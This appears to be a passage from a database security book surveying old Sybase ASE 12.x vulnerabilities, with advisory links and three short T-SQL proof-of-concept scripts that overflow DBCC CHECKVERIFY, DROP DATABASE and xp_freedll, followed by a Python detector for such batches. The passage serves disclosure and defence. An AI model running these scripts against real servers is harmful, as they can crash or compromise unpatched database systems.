Various security flaws have previously been discovered in Sybase. We list a few of them here.
In 2003, Rapid7 published an advisory relating to an overflow in the Sybase ASE 12.5 authentication handling code. They reported that they were able to trigger a heap overflow by specifying invalid lengths for the fields in login requests, although a correct username and password were required for the attack to work. The documented impact was a denial of service, but a great deal has been written about heap overflow exploitation since then that was not known at the time, and it is possible (in fact, probable) that the issue is exploitable.
In 2002, Application Security Inc. published an advisory relating to an exploitable stack overflow in the DBCC CHECKVERIFY command of Adaptive Server Enterprise 12.5. This command can be executed by a non-privileged user, and was therefore in the same category as the NGS bugs previously described.
You can find further information at
http://www.securityfocus.com/bid/6269
Here is a sample script that demonstrates the vulnerability:
declare @s varchar(16384)
/* build a 16384-byte string and pass it as the database name */
select @s = replicate('A', 16384)
DBCC CHECKVERIFY(@s)
In 2002, Application Security Inc. published an advisory relating to an exploitable stack overflow in the DROP DATABASE command, in ASE 12.5. Further information is available at
http://www.securityfocus.com/bid/6267
And, again, here is a script that demonstrates the vulnerability:
declare @s varchar(16384)
/* same oversized string, this time as the argument to DROP DATABASE */
select @s = replicate('A', 16384)
DROP DATABASE @s
In 2002, Application Security Inc. published an advisory on an exploitable stack overflow in the xp_freedll extended stored procedure in Sybase ASE 12.0 and 12.5. By default this extended stored procedure is accessible to all users, so the overflow would allow an unprivileged user to take full control of the database server. More info is available at
http://www.securityfocus.com/bid/6266
This script reproduces the bug:
declare @s1 varchar(10000)
/* 300 bytes of 'x' followed by '.dll': a 304-byte DLL name */
set @s1 = @s1 + replicate('x', 300)
set @s1 = @s1 + '.dll'
exec xp_freedll @s1
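All three Application Security Inc. bugs share one shape: a string argument far longer than any real database or DLL name handed to DBCC CHECKVERIFY, DROP DATABASE or xp_freedll. The following Python is an added example, not code from the book or from the advisories; it estimates how large a string a T-SQL batch can assemble (expanding replicate() calls and counting literals) and flags batches that invoke one of those three entry points with more than an assumed 255-byte threshold. The threshold and the sample batches are constructed for illustration.

```python
import re

# Entry points that the 2002 Application Security Inc. advisories report
# as overflowable in Sybase ASE 12.x when handed an oversized argument.
WATCHED_COMMANDS = ("dbcc checkverify", "drop database", "xp_freedll")

# Assumed threshold (not from the advisories): legitimate database and
# DLL names are far shorter than this, so anything longer merits a look.
MAX_REASONABLE_ARG = 255

REPLICATE_RE = re.compile(r"replicate\s*\(\s*'([^']*)'\s*,\s*(\d+)\s*\)", re.I)
LITERAL_RE = re.compile(r"'((?:[^']|'')*)'")

def estimate_string_bytes(batch: str) -> int:
    """Upper bound on the string a batch can build: each replicate() expands
    to pattern length * count, and every remaining literal counts once."""
    total = 0
    def expand(m: re.Match) -> str:
        nonlocal total
        total += len(m.group(1)) * int(m.group(2))
        return ""  # drop the call so its pattern literal is not counted twice
    rest = REPLICATE_RE.sub(expand, batch)
    total += sum(len(lit.replace("''", "'")) for lit in LITERAL_RE.findall(rest))
    return total

def watched_command(batch: str):
    """Return the first watched entry point named in the batch, else None."""
    lowered = re.sub(r"\s+", " ", batch.lower())
    for cmd in WATCHED_COMMANDS:
        if cmd in lowered:
            return cmd
    return None

def assess(batch: str) -> dict:
    cmd = watched_command(batch)
    size = estimate_string_bytes(batch)
    return {"command": cmd, "string_bytes": size,
            "suspicious": cmd is not None and size > MAX_REASONABLE_ARG}

# Constructed sample batches: the three advisory scripts plus a benign DROP.
SAMPLE_BATCHES = [
    "declare @s varchar(16384) select @s = replicate('A', 16384) DBCC CHECKVERIFY(@s)",
    "declare @s varchar(16384) select @s = replicate('A', 16384) DROP DATABASE @s",
    "declare @s1 varchar(10000) set @s1 = @s1 + replicate('x',300) "
    "set @s1 = @s1 + '.dll' exec xp_freedll @s1",
    "DROP DATABASE staging_copy",
]

if __name__ == "__main__":
    for batch in SAMPLE_BATCHES:
        print(assess(batch))
```

Run over captured SQL text or an ASE audit trail, the first three batches are flagged and the ordinary DROP DATABASE is not.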